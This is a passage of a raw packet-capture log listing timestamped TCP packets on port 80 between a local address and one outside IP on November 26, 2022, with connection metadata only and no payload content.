Nov 26, 2022 11:17:42.404705048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404722929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404726982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404741049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404747009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404766083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404784918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404803038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404819012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404822111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404839993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404840946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404860020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404865026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404879093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404880047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404896975 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404897928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404917002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404920101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404920101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404934883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404941082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404953957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404956102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.404972076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.404990911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405006886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405009985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405029058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405029058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405051947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405057907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405070066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405080080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405086040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405100107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405112982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405113935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405132055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405142069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405152082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405167103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405169010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405188084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405206919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405221939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405221939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405225992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405241966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405245066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405263901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405267000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405267000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405282021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405286074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405301094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405304909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405319929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405322075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405339003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405345917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405359030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405378103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405380964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405381918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405395985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405415058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405432940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405441046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405452013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405471087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405478001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405478001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405489922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405507088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405507088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405509949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405528069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405529976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405548096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405550957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405565977 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405569077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405586004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405586004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405603886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405607939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405623913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405627012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405642986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405646086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405663967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405668974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405688047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405693054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405705929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405710936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405725956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405730009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405745029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405746937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405762911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405764103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405782938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405786991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405802965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405803919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405822039 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405822039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405839920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405843973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405858994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405862093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405878067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405879974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405898094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405900955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405916929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405935049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405945063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405945063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405953884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405966043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.405972958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.405992031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406004906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406004906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406012058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406029940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406035900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406035900 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406049967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406054974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406069994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406074047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406086922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406097889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406104088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406122923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406124115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406124115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406142950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406147003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406160116 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406162024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406179905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406189919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406198978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406209946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406218052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406227112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406235933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406245947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406255007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406274080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406292915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406292915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406292915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406292915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406311989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406320095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406331062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406336069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406349897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406351089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406368017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406374931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406387091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406393051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406405926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406410933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406424046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406426907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406443119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.406445980 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406470060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.406488895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424058914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424099922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424118042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424137115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424141884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424156904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424170971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424175024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424196005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424206018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424216986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424230099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424235106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424252033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424271107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424279928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424289942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424293995 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424312115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424321890 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424329996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424338102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424349070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424350023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424365997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424367905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424386024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424397945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424397945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424403906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424423933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424433947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424439907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424453020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424470901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424488068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424490929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424505949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424515963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424523115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424540997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424541950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424561024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424566031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424578905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424590111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424596071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424602985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424614906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424618006 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424633026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424634933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424650908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424665928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424669027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424683094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424686909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424705029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424711943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424722910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424735069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424741983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424747944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424756050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424763918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424772978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424779892 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424792051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424798012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424809933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424812078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424828053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424828053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424843073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424848080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424865007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424870968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424881935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424885988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424900055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424901009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424916983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424916983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424935102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424941063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424952030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424953938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424968958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.424969912 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424987078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.424988031 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425004959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425012112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425024033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425025940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425045013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425071955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425071955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425081968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425092936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425100088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425118923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425120115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425136089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425137997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425158024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425163031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425177097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425179958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425192118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425198078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425218105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425218105 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425235033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425235987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425256014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425261021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425273895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425273895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425307989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425383091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425403118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425421000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425424099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425438881 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425452948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425457001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425476074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425478935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425494909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425502062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425513983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425527096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425534010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425539970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425553083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425555944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425569057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425570965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425584078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425590992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425609112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425610065 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425626993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425626993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425638914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425646067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425663948 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425664902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425683022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425693035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425693035 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425703049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425719976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425738096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425741911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425755978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425767899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425774097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425791025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425796032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425813913 CET	80	49707	66.235.200.147	192.168.2.5
